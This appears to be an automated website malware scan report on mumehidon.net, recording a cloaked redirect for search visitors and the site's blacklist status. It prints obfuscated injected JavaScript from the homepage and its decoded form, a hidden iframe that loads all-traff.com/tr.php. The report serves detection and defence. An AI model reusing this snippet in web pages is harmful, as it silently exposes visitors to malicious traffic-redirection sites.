Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://mumehidon.net/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: mumehidon.net Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Fri, 12 Sep 2014 04:46:24 GMT Location: http://hecodat.de/dfkv.html?h=3325313 Server: Apache Content-Length: 284 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://mumehidon.net/ | 200 OK Content-Length: 2369 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: all-traff.com function v52cf6dc7cf3b8(v52cf6dc7cf3f4){ var v52cf6dc7cf434=16; return(parseInt(v52cf6dc7cf3f4,v52cf6dc7cf434));}function v52cf6dc7cf4c8(v52cf6dc7cf516){ function v52cf6dc7cf5cc () {return 2;} var v52cf6dc7cf554='';for(v52cf6dc7cf590=0; v52cf6dc7cf590<v52cf6dc7cf516.length; v52cf6dc7cf590+=v52cf6dc7cf5cc()){ v52cf6dc7cf554+=(String.fromCharCode(v52cf6dc7cf3b8(v52cf6dc7cf516.substr(v52cf6dc7cf590, v52cf6dc7cf5cc()))));}return v52cf6dc7cf554;} document.write(v52cf6dc7cf4c8('3C696672616D65206E616D653D276527207372633D27687474703A2F2F616C6C2D74726166662E636F6D2F74722E706870272077696474683D333639206865696768743D313034207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E')); Decoded script: <iframe name='e' src='http://all-traff.com/tr.php' width=369 height=104 style='display:none'></iframe> | ||
http://freednslock.org/?id=ftp | 200 OK Content-Length: 272 Content-Type: text/html | clean |
http://freednslock.org/test404page.js | 200 OK Content-Length: 272 Content-Type: text/html | clean |
http://91.221.66.125/in.cgi?default | 404 Not Found Content-Length: 204 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mumehidon.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://mumehidon.net/
Result: mumehidon.net is not infected or malware details are not published yet.
Result: mumehidon.net is not infected or malware details are not published yet.